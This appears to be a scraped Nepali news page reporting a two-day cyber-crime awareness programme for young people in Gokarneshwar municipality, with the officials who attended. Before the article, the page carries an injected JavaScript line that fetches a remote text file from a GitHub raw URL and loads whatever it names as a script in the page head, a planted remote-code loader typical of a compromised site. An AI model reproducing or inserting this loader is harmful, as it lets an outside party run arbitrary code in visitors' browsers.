;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज काठमाडौँ
गोकर्णेश्वर नगरपालिका वडा नं ९ स्थित आरुबारी ब्यन्केटमा युवाहरुमा देखिने साइबर क्राइम सम्बन्धि २ दिने अभिमुखीकरण कार्यक्रम सम्पन्न भनेको छ |
जुनेली नेपालि मेडिया प्रोडक्सन प्रालि मार्फत सो कार्यक्रम भएको हो भने आर्थिक सहयोग गोकर्नेश्वर नगरपालिका वडा नं ९ ले गरेको हो | कर्यकरम्मा प्रमुख अतिथि संघिय संसद सन्तोष चालिसे, सोहि नगरपालिकाका मेयर दिपक रिसाल, वडा नं ९ का वडा अध्यक्ष राजिब थापा लगायत १०० भन्दा बढी युवाहरुको उपस्थिति रहेको थियो |
फेसबुक प्रतिक्रियाहरु